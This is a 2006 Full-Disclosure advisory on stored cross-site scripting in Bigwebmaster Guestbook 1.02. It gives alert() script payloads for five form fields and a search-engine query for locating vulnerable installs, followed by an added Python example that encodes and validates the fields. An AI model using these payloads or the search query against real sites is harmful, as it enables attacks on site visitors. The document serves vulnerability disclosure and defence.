[Full-disclosure] bigwebmaster guestbook multiply XSS
- From: Javor Ninov <drfrancky@xxxxxxxxxxx>
- Date: Thu, 04 May 2006 19:02:11 +0300
Bigwebmaster Guestbook version 1.02 and down
(taken from vendor site)
This is one of the most powerful guestbooks that you will find on the
internet. Visitors who come to your site will be able to leave comments
and other general information about themselves. If you want to know what
your visitors are thinking, and if you want a fully customizable script,
this one is perfect for you. Features include template files to fit any
website design, 9 standard fields, 9 extra fields (customizable),
unlimited entries, and easy to use admin area. Full online demo available.
site scripting when viewguest.cgi is accessed for displaying the content
of the guest book.
mail: xss@xxxxxxxxxxx <script>alert('XSS in mail');</script>
site: http://www.example.com/ <script>alert('XSS in site');</script>
city: <script>alert('XSS in city');</script>
state: <script>alert('XSS in state');</script>
country: <script>alert('XSS in country');</script>
intitle:Big Webmaster Guestbook
I DON'T CARE
Javor Ninov aka DrFrancky
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/
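Added example, not part of the original post and not the vendor's code: one way a guestbook view page could encode the five fields listed in the advisory before writing them into HTML, linking mail and site only when they validate. The entry layout, the function names and the sample e-mail address are assumptions made for illustration.

```python
import html
import re
from urllib.parse import urlsplit

# Field names come from the advisory; the dict-based entry layout is assumed.
TEXT_FIELDS = ("city", "state", "country")
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

def safe_link(url):
    """Link only clean http(s) URLs; anything else is shown as escaped text."""
    raw = url.strip()
    text = html.escape(raw, quote=True)
    try:
        parts = urlsplit(raw)
    except ValueError:
        return text
    # Scheme allow-list: keeps javascript:, data: and similar out of href.
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return text
    # Whitespace, quotes or angle brackets mean extra content rode along.
    if re.search(r"[\s<>\"']", raw):
        return text
    return '<a href="{0}" rel="nofollow noopener">{0}</a>'.format(text)

def safe_mail(addr):
    """Link only values that are a single plain address, else escaped text."""
    raw = addr.strip()
    text = html.escape(raw, quote=True)
    if EMAIL_RE.fullmatch(raw):
        return '<a href="mailto:{0}">{0}</a>'.format(text)
    return text

def render_entry(entry):
    """Build the table rows for one entry with every value HTML-encoded."""
    rows = [("mail", safe_mail(entry.get("mail", ""))),
            ("site", safe_link(entry.get("site", "")))]
    rows += [(f, html.escape(entry.get(f, ""), quote=True)) for f in TEXT_FIELDS]
    return "\n".join("<tr><th>{}</th><td>{}</td></tr>".format(k, v) for k, v in rows)

# Constructed sample entry reusing the field values shown in the advisory.
SAMPLE = {
    "mail": "xss@example.invalid <script>alert('XSS in mail');</script>",
    "site": "http://www.example.com/ <script>alert('XSS in site');</script>",
    "city": "<script>alert('XSS in city');</script>",
    "state": "<script>alert('XSS in state');</script>",
    "country": "<script>alert('XSS in country');</script>",
}

if __name__ == "__main__":
    print(render_entry(SAMPLE))
```

With this encoding the sample entry renders as inert text: the markup in each field is displayed to the reader rather than parsed by the browser.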